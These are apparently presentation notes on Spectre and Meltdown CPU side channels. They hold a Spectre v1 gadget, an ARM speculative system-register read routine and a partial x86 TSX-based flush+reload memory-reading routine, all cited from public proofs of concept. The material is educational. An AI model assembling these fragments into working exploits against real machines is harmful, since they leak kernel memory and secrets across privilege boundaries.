/Сергей Смитиенко/
www.nocservice.biz
Shadow Walker (2005) — https://www.blackhat.com/presentations/bh-jp-05/bh-jp-05-sparks-butler.pdf
MoRE Shadow Walker: TLB-splitting on Modern x86 (2014) — https://www.youtube.com/watch?v=yrFqaF-gd0g
Hello From the Other Side SSH Over Robust Cache Covert Channels in the Cloud - 2013 https://www.youtube.com/watch?v=a9sGk7FtnYk
ARMageddon: How Your Smartphone CPU Breaks Software-Level Security and Privacy - 2016 https://www.youtube.com/watch?v=9KsnFWejpQg
https://en.wikichip.org/wiki/intel/microarchitectures/skylake_(client)
; Two short, mutually independent instruction chains (illustrative only: the
; absolute addresses 1 and 2 are placeholders, not valid targets).
; Presumably shown to illustrate that an out-of-order core can work on the
; second chain while the first is still in flight — TODO confirm against
; the slide narration.
        mov     rax, 1
        add     rax, 1
        mov     [1], rax                ; store result of chain 1
        mov     rax, 2
        add     rax, 2
        mov     [2],rax                 ; store result of chain 2 (no data dependency on chain 1)
/* Bounds check followed by a data-dependent load — the classic Spectre
 * variant-1 shape. If the branch on x < array1_size is mispredicted, array1[x]
 * may be read speculatively and its value leaves a trace in the cache via
 * the array2[...] access even though the result is never committed.
 * Typical mitigation: a speculation barrier or index masking after the check. */
if (x < array1_size) y = array2[array1[x] * 256];
; Branch forms whose target is resolved at run time rather than encoded in the
; instruction. Presumably listed here because their predicted targets come from
; the branch predictor / return stack, the surface that branch-target injection
; abuses — TODO confirm against the slide narration.
        jmp     eax                     ; target held in a register
        jmp     [eax]                   ; target loaded from memory at [eax]
        jmp     dword ptr [0x01dec0de]  ; target loaded from an absolute address
        ret                             ; target popped from the stack (return address)
// https://github.com/lgeek/spec_poc_arm/
// void spec_read(void *probe_buf, void *miss_buf, int bit);
// AAPCS64: X0 = probe_buf, X1 = miss_buf, X2 = bit.
// Demonstration routine from the linked PoC. Nothing is returned in a register;
// the only thing left behind is which 4096-byte slot of probe_buf was touched,
// which is what a cache-timing probe later measures. Countermeasures for this
// class belong in firmware/kernel (see the Arm security update in the
// references), not in this routine.
    .global spec_read
    .func
spec_read:
    LDR     X1, [X1]                // load from miss_buf (the name suggests an intentionally cache-missing load — TODO confirm)
    NOP                             // replaced with MRS X3, SYSTEM_REG
    LSR     X3, X3, X2              // X3 >>= bit
    AND     X3, X3, #1              // keep only the selected bit (0 or 1)
    ADD     X0, X0, X3, LSL #12     // X0 = probe_buf + bit_value * 4096
    LDR     X0, [X0]                // touch that slot so it lands in the cache
    RET
    .endfunc
// https://github.com/lgeek/spec_poc_arm/
$ ./dump_sys_regs ACTLR_EL1 : 0x0 ACTLR_EL2 : 0x73 ... TTBR0_EL1 : 0xf89f0000d4454000 TTBR0_EL2 : 0x0 TTBR0_EL3 : 0x30010b00 TTBR1_EL1 : 0x8133f000 TTBR1_EL2 : 0x0 VDISR_EL2 : 0x0 VSESR_EL2 : 0x0 VTCR_EL2 : 0x80000000 VTTBR_EL2 : 0x0 AFSR0_EL12 : 0x0 AFSR1_EL12 : 0x0 AMAIR_EL12 : 0x0 CNTFRQ_EL0 : 0x1dcd650 CNTHCTL_EL2 : 0x3 CNTHP_CTL_EL2 : 0x0 CNTHP_CVAL_EL2 : 0x0 CNTHP_TVAL_EL2 : 0x65a29ee7 (dynamic?) CNTHV_CTL_EL2 : 0x0 CNTHV_CVAL_EL2 : 0x0 CNTHV_TVAL_EL2 : 0x0 CNTKCTL_EL1 : 0xc6 CNTKCTL_EL12 : 0x0 ...
asm_test_sig(unsigned char* target) { register int mix_i,i,j; register unsigned x; unsigned hit[256]; unsigned long time_read; unsigned junk; i = pread(fd, buf, sizeof(buf), 0); for (i = 0; i < 256; i++) hit[i] = 0; j = 100; do { for (i = 0; i < 256; i++) _mm_clflush( & test_arr[i*PSIZE] ); _asm_spec_read(target, test_arr); for (i = 0; i < 256; i++) { mix_i = ((i * 167) + 13) & 255; x = mix_i * PSIZE; time_read = _asm_time_read(&test_arr[x]); if (time_read < 100) { hit[mix_i] ++; } j--; } while (j > 0); ... ; rdi : base pointer _asm_time_read: push rbx xor rbx, rbx rdtscp ; edx = hi, eax = lo, ecx = junk mov ebx, edx shl rbx, 32 mov ebx, eax ; rbx = timestamp counter mov eax, [rdi] rdtscp shl rdx, 32 xor edx, edx or rax, rdx ; rax = timestamp counter sub rax, rbx pop rbx ret ; rsi : test_arr _asm_spec_read: xor rax, rax xor rcx, rcx xbegin ABORT_SPEC_READ spec_retry: %rep 300 add rax, 0x141 %endrep jz spec_retry movzx eax, byte [rdi] shl eax, 12 movzx ebx, byte [rsi + rax + 1] xend ABORT_SPEC_READ:
Intel® 64 and IA-32 Architectures Software Developer’s Manual
- Intel® 64 and IA-32 Architectures Software Developer’s Manual — https://software.intel.com/sites/default/files/managed/39/c5/325462-sdm-vol-1-2abcd-3abcd.pdf
- Intel® 64 and IA-32 Architectures Optimization Reference Manual — https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf
- Clémentine Maurice — https://cmaurice.fr/
- Arm Processor Security Update — https://developer.arm.com/support/security-update
- Meltdown Proof-of-Concept — https://github.com/IAIK/meltdown
- Spectre & Meltdown Checker — https://github.com/speed47/spectre-meltdown-checker
- Meltdown & Spectre PoC for OpenBSD — https://github.com/genua/meltdown
- ARM Meltdown PoC — https://github.com/lgeek/spec_poc_arm/
- This presentation — https://docs.google.com/presentation/d/1xZPaeh7zQ-u_d9zVLxsxcPtwKcYfXTp1RCjMojivhdI/
skype: sergey.smitienko, FB, LinkedIn